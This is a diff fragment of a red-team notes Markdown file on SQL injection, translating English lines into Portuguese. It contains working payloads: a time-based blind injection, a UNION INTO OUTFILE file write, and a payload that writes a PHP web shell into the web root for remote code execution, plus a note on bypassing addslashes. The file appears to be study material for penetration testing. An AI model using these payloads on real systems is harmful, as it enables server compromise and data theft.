ninjaa-exe/Red-Team-Notes/Vulnerabilities/Web/SQL Injection (SQLI).md

 Example: ' or if (ascii(substring(database(), 1, 1)) = 100, sleep(5), 0)#

 ## SQLi to RCE
-With SQL command injection, you can write data to the server with the INTO OUTFILE command and the path of the directory you want to save.
+Com a injeção de comando SQL, você pode gravar dados no servidor com o comando INTO OUTFILE e o caminho do diretório que deseja salvar

-Example: ‘ union all select 1,2,3,4, “string” INTO OUTFILE “/var/www/html/website/file.txt” %23
+Exemplo: ‘ union all select 1,2,3,4, “string” INTO OUTFILE “/var/www/html/website/file.txt” %23

-Example: ‘ union all select 1,2,3,4, “`<?php system($_GET[’parameter’]); ?>” INTO OUTFILE “/var/www/html/website/banners/file.php” %23
+Exemplo: ‘ union all select 1,2,3,4, “`<?php system($_GET[’parameter’]); ?>” INTO OUTFILE “/var/www/html/website/banners/file.php” %23

 ## Bypass addslashes
 In some cases, because of the way it was programmed to be queried in the database, some backslashes will be added to the query, making it impossible to make queries with single quotes, generating an error.
 However, one of the ways to circumvent this mechanism is to pass string values in decimals separated by commas with the char() function.